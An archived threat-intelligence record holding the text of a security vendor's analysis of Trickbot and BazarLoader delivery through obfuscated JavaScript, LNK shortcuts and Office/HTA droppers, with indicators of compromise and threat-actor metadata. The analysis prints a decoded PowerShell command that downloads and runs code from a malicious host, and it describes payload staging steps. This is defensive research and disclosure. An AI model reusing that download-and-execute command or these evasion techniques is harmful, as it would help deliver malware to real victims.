{
	"id": "70e54efc-77a8-4fc7-9cf7-0bf3196b73e4",
	"created_at": "2026-04-06T00:09:33.710849Z",
	"updated_at": "2026-04-10T03:37:23.890181Z",
	"deleted_at": null,
	"sha1_hash": "25a48aefef43cf459b65e2652cb46b9b53ca9c1c",
	"title": "New Trickbot and BazarLoader delivery vectors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2207986,
	"plain_text": "New Trickbot and BazarLoader delivery vectors\r\nBy Tarun Dewan, Lenart Brave\r\nPublished: 2021-10-08 · Archived: 2026-04-05 19:27:49 UTC\r\nThe Zscaler ThreatLabz research team monitors thousands of files daily tracking new and pervasive threats, including one of the most prominent banking trojans of the last five years: Trickbot. Trickbot has been active since 2016 and is linked to a large number of malicious campaigns involving bitcoin mining and theft of banking information, personal identifying information (PII), and credentials. BazarLoader is a spinoff of this trojan, developed by the same authors. Both are particularly dangerous as they are easily modifiable and capable of delivering multi-stage payloads, as well as taking over computers entirely.\r\nThreatLabz has discovered Trickbot operators using new approaches to delivering payloads in recent attack campaigns. The malware samples we analyzed were well-crafted and highly obfuscated with sandbox-evading capabilities. In this blog post, we will show analysis of the different delivery vectors used by Trickbot and BazarLoader.\r\nKey Points:\r\n1. Script and LNK files add evasion techniques to deliver malware threats.\r\n2. Multilayer obfuscation is used to preclude analysis of JS and LNK files.\r\n3. An Office attachment drops an HTA file with snippets of HTML and javascript functions.\r\n4. Newly registered domains are used to deliver threats.\r\nTrickbot is expanding its range of file types for malware delivery\r\nIn previous campaigns, Trickbot payloads were generally dropped as malicious attachments to Microsoft Office files. In the last month, we’ve seen that malware has also used javascript files at a high volume, along with a range of other file formats, as shown in the following charts:\r\nFig1: Trickbot blocked in the Zscaler Cloud Sandbox\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 1 of 9\r\nFig2: BazarLoader blocked in the Zscaler Cloud Sandbox\r\nIn this blog, we’ll walk through the attack chain for multiple delivery vectors, including:\r\nTrickbot spreading through scripting files\r\nTrickbot spreading through LNK files\r\nBazarLoader spreading through Office attachments\r\nTrickbot spreading through scripting files\r\nTrickbot gains intrusion using spam emails bundled with malicious javascript attachments, such as the following:\r\nFig3: Spam email attachment\r\nIn this case, the Javascript [5B606A5495A55F2BD8559778A620F21B] file has three layers of obfuscation that are mostly used to evade and bypass sandbox environments. Below is the snapshot of the first obfuscated layer:\r\nFig4: First layer of obfuscation in javascript\r\nIn addition to taking extreme effort to make javascript files highly obfuscated, the malware authors have also added large amounts of junk code to the end to make debugging more difficult. The junk code is just randomly generated obfuscated strings that play no role in the malicious code.\r\nFig5: Junk code to make analysis difficult\r\nUsing the eval() function we have de-obfuscated the second layer, in which malicious code is embedded with more junk code. After removing this layer of junk code, the eval() function is used once again to retrieve the final layer of code. We can see that the Trickbot authors used the setTimeout() method, which evaluates an expression after 967 milliseconds to delay execution in the sandbox. This helps the malware evade sandbox environments.\r\nFig6: Second layer of obfuscation in javascript\r\nIn the above snapshot we are able to see the replace method implemented in the code, where the “hdBDJ” and “tSJVh” strings are removed from the variables “YHPhEFtKjqbCmAZ” and “kVYJOrLSqvdAWnaGTX” respectively to get the final string.\r\nFig7: Final layer\r\nThe malicious Javascript executes cmd.exe as a child process, then cmd.exe executes powershell.exe to download Trickbot as payload.\r\nFlow of execution:\r\nWscript.exe -\u003e cmd.exe -\u003e powershell.exe\r\nPowershell.exe is launched with a base64 encoded command; after decoding, the command is:\r\nIEX (New-Object Net.Webclient).downloadstring(\"https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php\")\r\nFig8: Zscaler Cloud Sandbox detection of Javascript Downloader\r\nTrickbot spreading through LNK files\r\nWindows LNK files are usually seen by users as shortcuts, and we have frequently observed cybercriminals using LNK files to download malicious files such as Trickbot. Trickbot hides the code in the argument section under the properties section of the LNK file. The malware author added extra spaces in between the malicious code to attempt to make it more difficult for researchers to debug the code. We’ve seen this technique used previously in the Emotet campaign using malicious Office attachments in 2018.\r\nFig9: Code embedded in the properties section of LNK\r\nDownloading Trickbot:\r\n1. LNK downloads the file from 45.148.121.227/images/readytunes.png using a silent argument so that the user is not able to see any error message or progress action.\r\n2. After downloading, the malware saves the file to the Temp folder with the name application1_form.pdf.\r\n3. Finally, the file is renamed from application1_form.pdf to support.exe and executed. Here, support.exe is Trickbot.\r\nFig10: Zscaler Cloud Sandbox detection of LNK Downloader\r\nBazarLoader spreading through Office attachments\r\nThis is one of the other techniques used by TA551 APT aka Shathak. Malicious office documents drop the HTA file to “C:\\ProgramData\\sda.HTA”. This HTA file contains HTML and vbscript designed to retrieve a malicious DLL to infect a vulnerable Windows host with BazarLoader.\r\nOnce macros are enabled, the mshta.exe process executes to download a payload. This campaign has been observed delivering BazarLoader and Trickbot in the past.\r\nFig11: Attack chain of DOC file to download BazarLoader\r\nBase64 encoded data is embedded in the HTML tag, which is used later with javascript.\r\nFig12: Dropped HTA file: Malicious base64 encoded under HTML section\r\nBelow is the snapshot of the decoded base64 data, in which we can see it downloading the payload and saving it as friendIFriend,jpg to the victim machine:\r\nFig13: Dropped HTA file: Decoded Base64 data\r\nNetworking: C\u0026C to download BazarLoader\r\nFig14: Sending request to download BazarLoader\r\nWe have also observed newly registered domains (NRDs) specifically created to distribute these payloads, using a stealer delivered through spam email and bundled with a malicious Microsoft Office attachment.\r\nFig15: Newly registered domain\r\nFig16: Zscaler Cloud Sandbox detection of Malicious Office file Downloader\r\nJS.Downloader.Trickbot\r\nWin32.Backdoor.BazarLoader\r\nVBA.Downloader.BazarLoader\r\nMITRE ATT\u0026CK\r\nT5190 Gather Victim Network Information\r\nT1189 Drive-by Compromise\r\nT1082 System Information Discovery\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1564 Hide Artifacts\r\nT1027 Obfuscated Files or Information\r\nIndicators of Compromise\r\nMd5 Filename FileType\r\nB79AA1E30CD460B573114793CABDAFEB 100.js JS\r\nAB0BC0DDAB99FD245C8808D2984541FB 4821.js JS\r\n192D054C18EB592E85EBF6DE4334FA4D 4014.js JS\r\n21064644ED167754CF3B0C853C056F54 7776.js JS\r\n3B71E166590CD12D6254F7F8BB497F5A 7770.js JS\r\n5B606A5495A55F2BD8559778A620F21B 68.js JS\r\nBA89D7FC5C4A30868EA060D526DBCF56 Subcontractor Reviews (Sep 2021).lnk LNK\r\nMd5 Filename\r\nC7298C4B0AF3279942B2FF630999E746 a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz\r\n3F06A786F1D4EA3402A3A23E61279931 -\r\nAssociated URLs:\r\njolantagraban.pl/log/57843441668980/dll/assistant.php\r\nblomsterhuset-villaflora.dk/assistant.php\r\nd15k2d11r6t6rl.cloudfront.net/public/users/beefree\r\nC\u0026C:\r\nDomain Payload\r\njolantagraban.pl Trickbot\r\nglareestradad.com BazarLoader\r\nfrancopublicg.com BazarLoader\r\nSource: https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors"
	],
	"report_names": [
		"new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/25a48aefef43cf459b65e2652cb46b9b53ca9c1c.pdf",
		"text": "https://archive.orkl.eu/25a48aefef43cf459b65e2652cb46b9b53ca9c1c.txt",
		"img": "https://archive.orkl.eu/25a48aefef43cf459b65e2652cb46b9b53ca9c1c.jpg"
	}
}